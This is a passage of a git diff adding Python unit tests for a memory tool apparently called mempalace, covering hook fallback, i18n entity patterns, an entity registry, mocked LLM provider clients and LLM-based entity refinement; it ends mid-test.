+        # Do NOT chmod +x — the hook should notice and skip.
+        result = _run_hook(
+            SAVE_HOOK,
+            {"session_id": "abc", "stop_hook_active": False, "transcript_path": ""},
+            env_overrides={"MEMPAL_PYTHON": str(bogus), "HOME": str(tmp_path)},
+        )
+        assert (
+            result.returncode == 0
+        ), f"hook crashed on non-executable MEMPAL_PYTHON: {result.stderr!r}"
+
+    def test_falls_back_to_path_when_unset(self, tmp_path):
+        """With MEMPAL_PYTHON set to the empty string, the hook must use
+        whatever ``python3`` is found on PATH. Prove this by putting a
+        marker-emitting shim first on PATH."""
+        marker = tmp_path / "markers.log"
+        fake = _write_fake_python(
+            tmp_path / "python3",
+            can_import_mempalace=True,
+            marker_file=marker,
+        )
+        result = _run_hook(
+            SAVE_HOOK,
+            {"session_id": "abc", "stop_hook_active": False, "transcript_path": ""},
+            env_overrides={"MEMPAL_PYTHON": "", "HOME": str(tmp_path)},
+            path_prefix=[fake.parent],
+        )
+        assert result.returncode == 0
+        invocations = marker.read_text().splitlines() if marker.exists() else []
+        assert (
+            "python3" in invocations
+        ), f"fallback-to-PATH did not use the shimmed python3. Marker log: {invocations!r}"
diff --git a/tests/test_i18n.py b/tests/test_i18n.py
index b91e3522b..1f53da761 100644
--- a/tests/test_i18n.py
+++ b/tests/test_i18n.py
@@ -56,6 +56,7 @@ def test_dialect_compress_samples():
         "de": "Wir haben beschlossen, von SQLite auf PostgreSQL zu migrieren für bessere gleichzeitige Schreibvorgänge. Ben hat den PR gestern genehmigt.",
         "zh-CN": "我们决定从SQLite迁移到PostgreSQL以获得更好的并发写入。Ben昨天批准了PR。",
         "id": "Kami memutuskan untuk migrasi dari SQLite ke PostgreSQL untuk penulisan bersamaan yang lebih baik. Ben telah menyetujui PR kemarin.",
+        "be": "Мы вырашылі перайсці з SQLite на PostgreSQL для паляпшэння паралельнага запісу. Зміцер ухваліў PR ўчора.",
     }
 
     for lang, text in samples.items():
@@ -85,3 +86,76 @@ def test_from_config_defaults_to_english(tmp_path):
 
     d = Dialect.from_config(str(config_path))
     assert d.lang == "en", f"Expected 'en', got '{d.lang}' -- state leak from prior load_lang"
+
+
+def test_de_entity_section_loads():
+    """German entity section loads all pattern lists non-empty."""
+    from mempalace.i18n import get_entity_patterns
+
+    p = get_entity_patterns(("de",))
+    assert p["candidate_patterns"], "de: empty candidate_patterns"
+    assert p["multi_word_patterns"], "de: empty multi_word_patterns"
+    assert p["person_verb_patterns"], "de: empty person_verb_patterns"
+    assert p["pronoun_patterns"], "de: empty pronoun_patterns"
+    assert p["dialogue_patterns"], "de: empty dialogue_patterns"
+    assert p["direct_address_patterns"], "de: empty direct_address_patterns"
+    assert p["project_verb_patterns"], "de: empty project_verb_patterns"
+    assert len(p["stopwords"]) > 50, f"de: stopwords too short ({len(p['stopwords'])})"
+
+
+def test_es_entity_section_loads():
+    """Spanish entity section loads all pattern lists non-empty."""
+    from mempalace.i18n import get_entity_patterns
+
+    p = get_entity_patterns(("es",))
+    assert p["candidate_patterns"], "es: empty candidate_patterns"
+    assert p["multi_word_patterns"], "es: empty multi_word_patterns"
+    assert p["person_verb_patterns"], "es: empty person_verb_patterns"
+    assert p["pronoun_patterns"], "es: empty pronoun_patterns"
+    assert p["dialogue_patterns"], "es: empty dialogue_patterns"
+    assert p["direct_address_patterns"], "es: empty direct_address_patterns"
+    assert p["project_verb_patterns"], "es: empty project_verb_patterns"
+    assert len(p["stopwords"]) > 50, f"es: stopwords too short ({len(p['stopwords'])})"
+
+
+def test_fr_entity_section_loads():
+    """French entity section loads all pattern lists non-empty."""
+    from mempalace.i18n import get_entity_patterns
+
+    p = get_entity_patterns(("fr",))
+    assert p["candidate_patterns"], "fr: empty candidate_patterns"
+    assert p["multi_word_patterns"], "fr: empty multi_word_patterns"
+    assert p["person_verb_patterns"], "fr: empty person_verb_patterns"
+    assert p["pronoun_patterns"], "fr: empty pronoun_patterns"
+    assert p["dialogue_patterns"], "fr: empty dialogue_patterns"
+    assert p["direct_address_patterns"], "fr: empty direct_address_patterns"
+    assert p["project_verb_patterns"], "fr: empty project_verb_patterns"
+    assert len(p["stopwords"]) > 50, f"fr: stopwords too short ({len(p['stopwords'])})"
+
+
+def test_direct_address_key_is_singular_string_for_all_locales():
+    """Schema invariant: any locale declaring direct-address uses the singular
+    ``direct_address_pattern`` (str), never the plural ``direct_address_patterns`` (list).
+
+    The loader in ``mempalace/i18n/__init__.py`` only reads the singular key;
+    the plural form is the output schema of the merged dict, not the input schema.
+    Declaring the plural form in a locale file silently drops every direct-address
+    pattern in that locale after load.
+    """
+    from mempalace.i18n import _load_entity_section, available_languages
+
+    for lang in available_languages():
+        section = _load_entity_section(lang)
+        if not section:
+            continue
+        assert "direct_address_patterns" not in section, (
+            f"{lang}: declares plural 'direct_address_patterns' (list); "
+            f"loader only reads singular 'direct_address_pattern' (str). "
+            f"Collapse the list into one `|`-alternation string and rename the key."
+        )
+        if "direct_address_pattern" in section:
+            val = section["direct_address_pattern"]
+            assert isinstance(
+                val, str
+            ), f"{lang}: 'direct_address_pattern' must be str, got {type(val).__name__}"
+            assert val, f"{lang}: 'direct_address_pattern' is empty"
diff --git a/tests/test_known_entities_registry.py b/tests/test_known_entities_registry.py
new file mode 100644
index 000000000..300cfb612
--- /dev/null
+++ b/tests/test_known_entities_registry.py
@@ -0,0 +1,208 @@
+"""Tests for mempalace.miner.add_to_known_entities.
+
+Covers the init → miner wire-up: init's confirmed entities merged into
+``~/.mempalace/known_entities.json`` so the miner's drawer-tagging path
+recognizes them at mine time.
+
+Every test redirects the registry path to a tmp_path to avoid touching
+the real ~/.mempalace/ on the developer's machine.
+"""
+
+import json
+
+import pytest
+
+from mempalace import miner
+
+
+@pytest.fixture
+def temp_registry(tmp_path, monkeypatch):
+    """Redirect the module-level registry path to a tmp file and reset cache."""
+    registry = tmp_path / "known_entities.json"
+    monkeypatch.setattr(miner, "_ENTITY_REGISTRY_PATH", str(registry))
+    miner._ENTITY_REGISTRY_CACHE.update({"mtime": None, "names": frozenset(), "raw": {}})
+    return registry
+
+
+# ── fresh-file cases ────────────────────────────────────────────────────
+
+
+def test_creates_registry_when_absent(temp_registry):
+    assert not temp_registry.exists()
+    miner.add_to_known_entities({"people": ["Alice", "Bob"], "projects": ["foo"]})
+    assert temp_registry.exists()
+    data = json.loads(temp_registry.read_text())
+    assert sorted(data["people"]) == ["Alice", "Bob"]
+    assert data["projects"] == ["foo"]
+
+
+def test_returns_registry_path(temp_registry):
+    result = miner.add_to_known_entities({"people": ["Alice"]})
+    assert result == str(temp_registry)
+
+
+def test_empty_input_still_creates_file(temp_registry):
+    """An empty merge may or may not write the file; if it does, no entries are present."""
+    miner.add_to_known_entities({})
+    # File may or may not be written for a truly empty call — tolerate either.
+    if temp_registry.exists():
+        data = json.loads(temp_registry.read_text())
+        assert data == {} or all(not v for v in data.values())
+
+
+def test_skips_empty_name_strings(temp_registry):
+    miner.add_to_known_entities({"people": ["Alice", "", None]})
+    data = json.loads(temp_registry.read_text())
+    assert data["people"] == ["Alice"]
+
+
+# ── union / dedup cases ────────────────────────────────────────────────
+
+
+def test_unions_with_existing_list_category(temp_registry):
+    temp_registry.write_text(json.dumps({"people": ["Alice", "Bob"]}))
+    miner.add_to_known_entities({"people": ["Bob", "Carol"]})
+    data = json.loads(temp_registry.read_text())
+    # Bob not duplicated, Carol appended, original order preserved
+    assert data["people"] == ["Alice", "Bob", "Carol"]
+
+
+def test_case_insensitive_dedup_preserves_first_seen_variant(temp_registry):
+    temp_registry.write_text(json.dumps({"people": ["Alice"]}))
+    miner.add_to_known_entities({"people": ["alice", "ALICE", "Bob"]})
+    data = json.loads(temp_registry.read_text())
+    # Alice stays as-is; lowercase/uppercase variants don't create new entries
+    assert data["people"] == ["Alice", "Bob"]
+
+
+def test_preserves_untouched_categories(temp_registry):
+    """A category the caller didn't mention must be left alone."""
+    temp_registry.write_text(json.dumps({"people": ["Alice"], "places": ["Paris", "Tokyo"]}))
+    miner.add_to_known_entities({"people": ["Bob"]})
+    data = json.loads(temp_registry.read_text())
+    assert data["places"] == ["Paris", "Tokyo"]
+    assert data["people"] == ["Alice", "Bob"]
+
+
+def test_adds_new_categories(temp_registry):
+    temp_registry.write_text(json.dumps({"people": ["Alice"]}))
+    miner.add_to_known_entities({"projects": ["foo", "bar"]})
+    data = json.loads(temp_registry.read_text())
+    assert data["people"] == ["Alice"]
+    assert data["projects"] == ["foo", "bar"]
+
+
+def test_dedupes_within_input(temp_registry):
+    miner.add_to_known_entities({"people": ["Alice", "alice", "Alice"]})
+    data = json.loads(temp_registry.read_text())
+    assert data["people"] == ["Alice"]
+
+
+# ── dict-format existing registry ──────────────────────────────────────
+
+
+def test_dict_format_existing_category_gets_new_keys(temp_registry):
+    """Miner supports {name: code} dict categories (alternate registry shape).
+    New names are added as keys without overwriting existing codes."""
+    temp_registry.write_text(json.dumps({"people": {"Alice": "ALC", "Bob": "BOB"}}))
+    miner.add_to_known_entities({"people": ["Alice", "Carol"]})
+    data = json.loads(temp_registry.read_text())
+    # Alice's code survives; Carol added with None; Bob untouched
+    assert data["people"]["Alice"] == "ALC"
+    assert data["people"]["Bob"] == "BOB"
+    assert "Carol" in data["people"]
+    assert data["people"]["Carol"] is None
+
+
+def test_dict_format_dedupes_case_insensitively_and_stringifies_new_names(temp_registry):
+    temp_registry.write_text(json.dumps({"people": {"Alice": "ALC"}}))
+    miner.add_to_known_entities({"people": ["alice", 123]})
+    data = json.loads(temp_registry.read_text())
+    assert data["people"] == {"Alice": "ALC", "123": None}
+
+
+# ── error tolerance ───────────────────────────────────────────────────
+
+
+def test_malformed_existing_registry_starts_fresh(temp_registry):
+    temp_registry.write_text("{ not valid json")
+    miner.add_to_known_entities({"people": ["Alice"]})
+    data = json.loads(temp_registry.read_text())
+    assert data == {"people": ["Alice"]}
+
+
+def test_non_dict_existing_registry_starts_fresh(temp_registry):
+    temp_registry.write_text(json.dumps(["unexpected", "array"]))
+    miner.add_to_known_entities({"people": ["Alice"]})
+    data = json.loads(temp_registry.read_text())
+    assert data == {"people": ["Alice"]}
+
+
+def test_non_list_input_category_ignored(temp_registry):
+    miner.add_to_known_entities({"people": ["Alice"], "weird": "not a list"})
+    data = json.loads(temp_registry.read_text())
+    assert "weird" not in data or data.get("weird") == "not a list"
+    assert data["people"] == ["Alice"]
+
+
+# ── cache invalidation ───────────────────────────────────────────────
+
+
+def test_cache_invalidated_so_subsequent_load_sees_write(temp_registry):
+    """cmd_init → cmd_mine runs in the same process; the load path must
+    see what init just wrote without a process restart."""
+    # Prime the cache with an empty state
+    miner._load_known_entities()
+    assert miner._load_known_entities() == frozenset()
+
+    miner.add_to_known_entities({"people": ["Alice", "Bob"], "projects": ["foo"]})
+
+    loaded = miner._load_known_entities()
+    assert "Alice" in loaded
+    assert "Bob" in loaded
+    assert "foo" in loaded
+
+
+def test_raw_view_reflects_write(temp_registry):
+    miner.add_to_known_entities({"people": ["Alice"]})
+    raw = miner._load_known_entities_raw()
+    assert raw.get("people") == ["Alice"]
+
+
+# ── Unicode round-trip ────────────────────────────────────────────────
+
+
+def test_unicode_names_written_literally_not_escaped(temp_registry):
+    """`ensure_ascii=False` so non-ASCII names stay readable on disk."""
+    miner.add_to_known_entities({"people": ["Gergő Móricz", "Arturo Domínguez"]})
+    raw_text = temp_registry.read_text(encoding="utf-8")
+    assert "Gergő" in raw_text
+    assert "Móricz" in raw_text
+    # Round-trips through JSON
+    data = json.loads(raw_text)
+    assert "Gergő Móricz" in data["people"]
+
+
+# ── end-to-end: does the write actually help _extract_entities_for_metadata? ──
+
+
+def test_populated_registry_improves_miner_recall(temp_registry):
+    """End-to-end check of the wire-up: every name registered through
+    add_to_known_entities must show up in the miner's entity metadata string."""
+    people = ("Julia Grib", "Kevin Heifner")
+    projects = ("hyperion-history", "mempalace")
+    miner.add_to_known_entities({"people": list(people), "projects": list(projects)})
+
+    text = (
+        "Met with Julia Grib yesterday about the mempalace release. "
+        "Kevin Heifner pushed the hyperion-history fix."
+    )
+    metadata = miner._extract_entities_for_metadata(text)
+    if metadata:
+        tagged = set(metadata.split(";"))
+    else:
+        tagged = set()
+
+    # Each of the four registered entities must appear as its own ';'-separated tag.
+    for expected in (*people, *projects):
+        assert expected in tagged, f"expected '{expected}' in metadata {tagged!r}"
diff --git a/tests/test_llm_client.py b/tests/test_llm_client.py
new file mode 100644
index 000000000..184d1000d
--- /dev/null
+++ b/tests/test_llm_client.py
@@ -0,0 +1,327 @@
+"""Tests for mempalace.llm_client.
+
+HTTP is mocked throughout — these tests do not require a running Ollama
+or network access. Live-provider smoke tests live outside the unit-test
+suite.
+"""
+
+import json
+from unittest.mock import patch, MagicMock
+
+import pytest
+
+from mempalace.llm_client import (
+    AnthropicProvider,
+    LLMError,
+    OllamaProvider,
+    OpenAICompatProvider,
+    _http_post_json,
+    get_provider,
+)
+
+
+# ── factory ─────────────────────────────────────────────────────────────
+
+
+def test_get_provider_ollama():
+    p = get_provider("ollama", "gemma4:e4b")
+    assert isinstance(p, OllamaProvider)
+    assert p.model == "gemma4:e4b"
+    assert p.endpoint == OllamaProvider.DEFAULT_ENDPOINT
+
+
+def test_get_provider_openai_compat():
+    p = get_provider("openai-compat", "foo", endpoint="http://localhost:1234")
+    assert isinstance(p, OpenAICompatProvider)
+
+
+def test_get_provider_anthropic():
+    p = get_provider("anthropic", "claude-haiku", api_key="sk-xxx")
+    assert isinstance(p, AnthropicProvider)
+    assert p.api_key == "sk-xxx"
+
+
+def test_get_provider_unknown_raises():
+    with pytest.raises(LLMError, match="Unknown provider"):
+        get_provider("nonsense", "x")
+
+
+# ── _http_post_json ─────────────────────────────────────────────────────
+
+
+def test_http_post_json_success():
+    """A well-formed JSON body is decoded and returned as a dict."""
+    response = MagicMock()
+    response.read.return_value = b'{"ok": true}'
+    # Let the mock double as its own context manager for `with urlopen(...)`
+    response.__enter__.return_value, response.__exit__.return_value = response, False
+    with patch("mempalace.llm_client.urlopen", return_value=response):
+        assert _http_post_json("http://x/y", {"a": 1}, {}, timeout=5) == {"ok": True}
+
+
+def test_http_post_json_http_error_wraps_as_llm_error():
+    from urllib.error import HTTPError
+    import io
+
+    err = HTTPError("http://x", 404, "Not Found", {}, io.BytesIO(b"model missing"))
+    with patch("mempalace.llm_client.urlopen", side_effect=err):
+        with pytest.raises(LLMError, match="HTTP 404"):
+            _http_post_json("http://x", {}, {}, timeout=5)
+
+
+def test_http_post_json_url_error_wraps_as_llm_error():
+    from urllib.error import URLError
+
+    with patch("mempalace.llm_client.urlopen", side_effect=URLError("conn refused")):
+        with pytest.raises(LLMError, match="Cannot reach"):
+            _http_post_json("http://x", {}, {}, timeout=5)
+
+
+def test_http_post_json_malformed_response():
+    mock_resp = MagicMock()
+    mock_resp.read.return_value = b"not json"
+    mock_resp.__enter__.return_value = mock_resp
+    mock_resp.__exit__.return_value = False
+    with patch("mempalace.llm_client.urlopen", return_value=mock_resp):
+        with pytest.raises(LLMError, match="Malformed"):
+            _http_post_json("http://x", {}, {}, timeout=5)
+
+
+# ── OllamaProvider ──────────────────────────────────────────────────────
+
+
+def _mock_ollama_chat_response(content: str):
+    """Build a context-manager mock whose read() yields a chat payload."""
+    body = json.dumps({"message": {"content": content}}).encode()
+    response = MagicMock(**{"read.return_value": body})
+    response.__enter__.return_value, response.__exit__.return_value = response, False
+    return response
+
+
+def test_ollama_check_available_finds_model():
+    """An exact model-name match in the tag listing reports (True, "ok")."""
+    listing = {"models": [{"name": "gemma4:e4b"}, {"name": "other:latest"}]}
+    response = MagicMock()
+    response.read.return_value = json.dumps(listing).encode()
+    response.__enter__.return_value = response
+    response.__exit__.return_value = False
+    with patch("mempalace.llm_client.urlopen", return_value=response):
+        available, message = OllamaProvider(model="gemma4:e4b").check_available()
+    assert available
+    assert message == "ok"
+
+
+def test_ollama_check_available_accepts_latest_suffix():
+    tags = {"models": [{"name": "mymodel:latest"}]}
+    mock = MagicMock()
+    mock.read.return_value = json.dumps(tags).encode()
+    mock.__enter__.return_value = mock
+    mock.__exit__.return_value = False
+    with patch("mempalace.llm_client.urlopen", return_value=mock):
+        p = OllamaProvider(model="mymodel")
+        ok, _ = p.check_available()
+    assert ok
+
+
+def test_ollama_check_available_missing_model():
+    tags = {"models": [{"name": "other:latest"}]}
+    mock = MagicMock()
+    mock.read.return_value = json.dumps(tags).encode()
+    mock.__enter__.return_value = mock
+    mock.__exit__.return_value = False
+    with patch("mempalace.llm_client.urlopen", return_value=mock):
+        p = OllamaProvider(model="absent")
+        ok, msg = p.check_available()
+    assert not ok
+    assert "ollama pull absent" in msg
+
+
+def test_ollama_check_available_unreachable():
+    from urllib.error import URLError
+
+    with patch("mempalace.llm_client.urlopen", side_effect=URLError("refused")):
+        p = OllamaProvider(model="gemma4:e4b")
+        ok, msg = p.check_available()
+    assert not ok
+    assert "Cannot reach Ollama" in msg
+
+
+def test_ollama_classify_sends_json_format():
+    seen = {}
+
+    def fake_urlopen(req, *, timeout):
+        # Record the outgoing request, then answer with a canned chat reply
+        seen.update(url=req.full_url, body=json.loads(req.data.decode()))
+        return _mock_ollama_chat_response('{"classifications": []}')
+
+    with patch("mempalace.llm_client.urlopen", side_effect=fake_urlopen):
+        reply = OllamaProvider(model="gemma4:e4b").classify("sys", "user", json_mode=True)
+
+    sent = seen["body"]
+    assert sent["format"] == "json"
+    assert sent["model"] == "gemma4:e4b"
+    assert seen["url"].endswith("/api/chat")
+    assert reply.provider == "ollama"
+    assert reply.text == '{"classifications": []}'
+
+
+def test_ollama_classify_empty_content_raises():
+    with patch("mempalace.llm_client.urlopen", return_value=_mock_ollama_chat_response("")):
+        p = OllamaProvider(model="x")
+        with pytest.raises(LLMError, match="Empty response"):
+            p.classify("s", "u")
+
+
+# ── OpenAICompatProvider ────────────────────────────────────────────────
+
+
+def _mock_openai_response(content: str):
+    """Fake urlopen result carrying a one-choice chat-completions payload."""
+    encoded = json.dumps({"choices": [{"message": {"content": content}}]}).encode()
+    response = MagicMock()
+    response.read.return_value = encoded
+    response.__enter__.return_value, response.__exit__.return_value = response, False
+    return response
+
+
+def test_openai_compat_resolves_url_with_v1_suffix():
+    captured = {}
+
+    def fake_urlopen(req, *, timeout):
+        captured["url"] = req.full_url
+        return _mock_openai_response('{"ok": true}')
+
+    with patch("mempalace.llm_client.urlopen", side_effect=fake_urlopen):
+        p = OpenAICompatProvider(model="x", endpoint="http://h:1234")
+        p.classify("s", "u")
+    assert captured["url"] == "http://h:1234/v1/chat/completions"
+
+
+def test_openai_compat_resolves_url_with_existing_v1():
+    captured = {}
+
+    def fake_urlopen(req, *, timeout):
+        captured["url"] = req.full_url
+        return _mock_openai_response('{"ok": true}')
+
+    with patch("mempalace.llm_client.urlopen", side_effect=fake_urlopen):
+        p = OpenAICompatProvider(model="x", endpoint="http://h:1234/v1")
+        p.classify("s", "u")
+    assert captured["url"] == "http://h:1234/v1/chat/completions"
+
+
+def test_openai_compat_requires_endpoint():
+    p = OpenAICompatProvider(model="x")
+    with pytest.raises(LLMError, match="requires --llm-endpoint"):
+        p.classify("s", "u")
+
+
+def test_openai_compat_sends_authorization_when_key_present():
+    captured = {}
+
+    def fake_urlopen(req, *, timeout):
+        captured["auth"] = req.get_header("Authorization")
+        return _mock_openai_response('{"ok": true}')
+
+    with patch("mempalace.llm_client.urlopen", side_effect=fake_urlopen):
+        p = OpenAICompatProvider(model="x", endpoint="http://h", api_key="sk-aaa")
+        p.classify("s", "u")
+    assert captured["auth"] == "Bearer sk-aaa"
+
+
+def test_openai_compat_uses_env_var_fallback(monkeypatch):
+    monkeypatch.setenv("OPENAI_API_KEY", "sk-from-env")
+    p = OpenAICompatProvider(model="x", endpoint="http://h")
+    assert p.api_key == "sk-from-env"
+
+
+def test_openai_compat_sends_response_format_json():
+    captured = {}
+
+    def fake_urlopen(req, *, timeout):
+        captured["body"] = json.loads(req.data.decode())
+        return _mock_openai_response('{"ok": true}')
+
+    with patch("mempalace.llm_client.urlopen", side_effect=fake_urlopen):
+        p = OpenAICompatProvider(model="x", endpoint="http://h")
+        p.classify("s", "u", json_mode=True)
+    assert captured["body"]["response_format"] == {"type": "json_object"}
+
+
+def test_openai_compat_unexpected_shape_raises():
+    mock = MagicMock()
+    mock.read.return_value = b'{"nothing": "here"}'
+    mock.__enter__.return_value = mock
+    mock.__exit__.return_value = False
+    with patch("mempalace.llm_client.urlopen", return_value=mock):
+        p = OpenAICompatProvider(model="x", endpoint="http://h")
+        with pytest.raises(LLMError, match="Unexpected response shape"):
+            p.classify("s", "u")
+
+
+# ── AnthropicProvider ───────────────────────────────────────────────────
+
+
+def _mock_anthropic_response(text: str):
+    """Fake urlopen result carrying a single text content block."""
+    response = MagicMock()
+    blocks = [{"type": "text", "text": text}]
+    response.read.return_value = json.dumps({"content": blocks}).encode()
+    response.__enter__.return_value, response.__exit__.return_value = response, False
+    return response
+
+
+def test_anthropic_requires_api_key(monkeypatch):
+    monkeypatch.delenv("ANTHROPIC_API_KEY", raising=False)
+    p = AnthropicProvider(model="claude-haiku")
+    ok, msg = p.check_available()
+    assert not ok
+    assert "ANTHROPIC_API_KEY" in msg
+
+
+def test_anthropic_reads_env_key(monkeypatch):
+    monkeypatch.setenv("ANTHROPIC_API_KEY", "sk-ant-env")
+    p = AnthropicProvider(model="claude-haiku")
+    assert p.api_key == "sk-ant-env"
+    ok, _ = p.check_available()
+    assert ok
+
+
+def test_anthropic_classify_sends_version_and_key():
+    captured = {}
+
+    def fake_urlopen(req, *, timeout):
+        captured["api_key"] = req.get_header("X-api-key")
+        captured["version"] = req.get_header("Anthropic-version")
+        return _mock_anthropic_response('{"ok": true}')
+
+    with patch("mempalace.llm_client.urlopen", side_effect=fake_urlopen):
+        p = AnthropicProvider(model="claude-haiku", api_key="sk-ant-abc")
+        resp = p.classify("s", "u")
+    assert captured["api_key"] == "sk-ant-abc"
+    assert captured["version"] == AnthropicProvider.API_VERSION
+    assert resp.text == '{"ok": true}'
+
+
+def test_anthropic_joins_multiple_text_blocks():
+    """Text from several content blocks is concatenated in order."""
+    fragments = ["part one. ", "part two."]
+    payload = {"content": [{"type": "text", "text": piece} for piece in fragments]}
+    response = MagicMock()
+    response.read.return_value = json.dumps(payload).encode()
+    response.__enter__.return_value = response
+    response.__exit__.return_value = False
+
+    with patch("mempalace.llm_client.urlopen", return_value=response):
+        provider = AnthropicProvider(model="claude-haiku", api_key="sk-ant")
+        reply = provider.classify("s", "u")
+
+    # Joined with no separator: the first fragment already ends in a space
+    assert reply.text == "part one. part two."
+
+
+def test_anthropic_no_key_raises_on_classify(monkeypatch):
+    monkeypatch.delenv("ANTHROPIC_API_KEY", raising=False)
+    p = AnthropicProvider(model="claude-haiku")
+    with pytest.raises(LLMError, match="requires ANTHROPIC_API_KEY"):
+        p.classify("s", "u")
diff --git a/tests/test_llm_refine.py b/tests/test_llm_refine.py
new file mode 100644
index 000000000..b3e7d2d2f
--- /dev/null
+++ b/tests/test_llm_refine.py
@@ -0,0 +1,631 @@
+"""Tests for mempalace.llm_refine.
+
+Uses a fake provider for deterministic, offline tests. No network.
+"""
+
+from dataclasses import dataclass
+
+
+from mempalace.llm_client import LLMError, LLMResponse
+from mempalace.llm_refine import (
+    _apply_classifications,
+    _build_user_prompt,
+    _collect_contexts,
+    _extract_json_candidates,
+    _is_authoritative_person,
+    _is_authoritative_project,
+    _parse_response,
+    collect_corpus_text,
+    refine_entities,
+)
+
+
+# ── fake provider ───────────────────────────────────────────────────────
+
+
+@dataclass
+class FakeProvider:
+    """Scripted provider: returns ``response_text`` or raises, with no network."""
+
+    response_text: str = ""  # text placed in every LLMResponse
+    should_raise: "Exception | None" = None  # raised by classify() when set
+    call_count: int = 0  # number of classify() calls made so far
+    interrupt_on_call: int = -1  # 1-based call number that raises KeyboardInterrupt
+
+    def classify(self, system, user, json_mode=True):
+        self.call_count += 1
+        if self.call_count == self.interrupt_on_call:  # simulated Ctrl-C, checked first
+            raise KeyboardInterrupt()
+        if self.should_raise is not None:
+            raise self.should_raise
+        return LLMResponse(text=self.response_text, model="fake", provider="fake", raw={})
+
+    def check_available(self):
+        return True, "ok"
+
+
+# ── _collect_contexts ───────────────────────────────────────────────────
+
+
+def test_collect_contexts_finds_matches():
+    """Three lines mention Alice, but max_lines=2 caps what is returned."""
+    corpus = [
+        "Something about Alice",
+        "Bob said hello",
+        "Alice was here",
+        "Alice walked by",
+    ]
+    hits = _collect_contexts(corpus, "Alice", max_lines=2)
+    assert len(hits) == 2 and all("alice" in hit.lower() for hit in hits)
+
+
+def test_collect_contexts_case_insensitive():
+    lines = ["lowercase alice mention"]
+    out = _collect_contexts(lines, "Alice")
+    assert out == ["lowercase alice mention"]
+
+
+def test_collect_contexts_uses_token_boundaries():
+    lines = [
+        "forgot should not match",
+        "Go is a language.",
+        "go-v1 shipped.",
+    ]
+    out = _collect_contexts(lines, "Go", max_lines=5)
+    assert out == ["Go is a language.", "go-v1 shipped."]
+
+
+def test_collect_contexts_dedupes_identical_lines():
+    """A line repeated verbatim is only returned once."""
+    repeated = ["Alice"] * 2 + ["Alice was here"]
+    # two unique lines, not three
+    assert len(_collect_contexts(repeated, "Alice", max_lines=5)) == 2
+
+
+def test_collect_contexts_truncates_long_lines():
+    lines = ["Alice " + ("x" * 1000)]
+    out = _collect_contexts(lines, "Alice")
+    assert len(out[0]) <= 240
+
+
+def test_collect_contexts_no_matches():
+    assert _collect_contexts(["nothing here"], "Alice") == []
+
+
+# ── _build_user_prompt ──────────────────────────────────────────────────
+
+
+def test_build_user_prompt_numbers_and_includes_contexts():
+    """Entries are numbered from 1; an empty context list gets a placeholder."""
+    entries = [
+        ("Alice", "uncertain", ["Alice said hi"]),
+        ("Bob", "project", []),
+    ]
+    prompt = _build_user_prompt(entries)
+    # Numbering, the supplied context line, and the empty-context placeholder
+    expected = ("1. Alice", "2. Bob", "Alice said hi", "(no context available)")
+    for fragment in expected:
+        assert fragment in prompt
+
+
+# ── _parse_response ─────────────────────────────────────────────────────
+
+
+def test_parse_response_canonicalizes_label():
+    text = '{"classifications": [{"name": "Alice", "label": "person", "reason": "x"}]}'
+    out = _parse_response(text, ["Alice"])
+    assert out["Alice"] == ("PERSON", "x")
+
+
+def test_parse_response_accepts_type_alias():
+    """LLMs may return 'type' instead of 'label'."""
+    text = '{"classifications": [{"name": "Bob", "type": "PROJECT"}]}'
+    out = _parse_response(text, ["Bob"])
+    assert out["Bob"][0] == "PROJECT"
+
+
+def test_parse_response_maps_unknown_label_to_ambiguous():
+    text = '{"classifications": [{"name": "X", "label": "WEIRD"}]}'
+    out = _parse_response(text, ["X"])
+    assert out["X"][0] == "AMBIGUOUS"
+
+
+def test_parse_response_restores_canonical_casing():
+    """Model may lowercase the name; we restore against the expected set."""
+    text = '{"classifications": [{"name": "mempalace", "label": "PROJECT"}]}'
+    out = _parse_response(text, ["MemPalace"])
+    assert "MemPalace" in out
+    assert out["MemPalace"][0] == "PROJECT"
+
+
+def test_parse_response_strips_code_fences():
+    text = '```json\n{"classifications": [{"name": "X", "label": "TOPIC"}]}\n```'
+    out = _parse_response(text, ["X"])
+    assert out["X"][0] == "TOPIC"
+
+
+def test_parse_response_extracts_json_after_prose():
+    text = 'Sure, here is the JSON: {"classifications": [{"name": "X", "label": "TOPIC"}]}'
+    out = _parse_response(text, ["X"])
+    assert out["X"][0] == "TOPIC"
+
+
+def test_parse_response_extracts_fenced_json_after_prose():
+    text = 'Sure:\n```json\n{"classifications": [{"name": "X", "label": "PROJECT"}]}\n```'
+    out = _parse_response(text, ["X"])
+    assert out["X"][0] == "PROJECT"
+
+
+def test_extract_json_candidates_handles_embedded_array():
+    text = 'prefix [{"name": "Y", "label": "PERSON"}] suffix'
+    candidates = _extract_json_candidates(text)
+    assert '[{"name": "Y", "label": "PERSON"}]' in candidates
+
+
+def test_parse_response_ignores_non_json_brackets_before_payload():
+    text = 'See [note] first. JSON: {"classifications": [{"name": "X", "label": "TOPIC"}]}'
+    out = _parse_response(text, ["X"])
+    assert out["X"][0] == "TOPIC"
+
+
+def test_parse_response_malformed_returns_empty():
+    out = _parse_response("not json at all", ["X"])
+    assert out == {}
+
+
+def test_parse_response_accepts_top_level_list():
+    """Some models skip the wrapping object and return the list directly."""
+    text = '[{"name": "Y", "label": "PERSON"}]'
+    out = _parse_response(text, ["Y"])
+    assert out["Y"][0] == "PERSON"
+
+
+# ── _apply_classifications ──────────────────────────────────────────────
+
+
+def test_apply_classifications_moves_to_correct_bucket():
+    detected = {
+        "people": [],
+        "projects": [
+            {
+                "name": "Foo",
+                "type": "project",
+                "confidence": 0.8,
+                "frequency": 3,
+                "signals": ["old"],
+            }
+        ],
+        "uncertain": [
+            {"name": "Alice", "type": "uncertain", "confidence": 0.4, "frequency": 5, "signals": []}
+        ],
+    }
+    decisions = {
+        "Foo": ("PROJECT", "real project name"),
+        "Alice": ("PERSON", "clearly a person"),
+    }
+    new, reclass, dropped = _apply_classifications(detected, decisions)
+    assert len(new["people"]) == 1
+    assert new["people"][0]["name"] == "Alice"
+    assert new["people"][0]["type"] == "person"
+    assert reclass == 1  # Alice moved uncertain -> people
+    assert dropped == 0
+
+
+def test_apply_classifications_drops_common_word():
+    detected = {
+        "people": [],
+        "projects": [],
+        "uncertain": [
+            {
+                "name": "Never",
+                "type": "uncertain",
+                "confidence": 0.4,
+                "frequency": 20,
+                "signals": [],
+            }
+        ],
+    }
+    decisions = {"Never": ("COMMON_WORD", "adverb")}
+    new, _, dropped = _apply_classifications(detected, decisions)
+    assert dropped == 1
+    assert new["uncertain"] == []
+
+
+def test_apply_classifications_keeps_unvisited_entries():
+    detected = {
+        "people": [
+            {
+                "name": "Igor",
+                "type": "person",
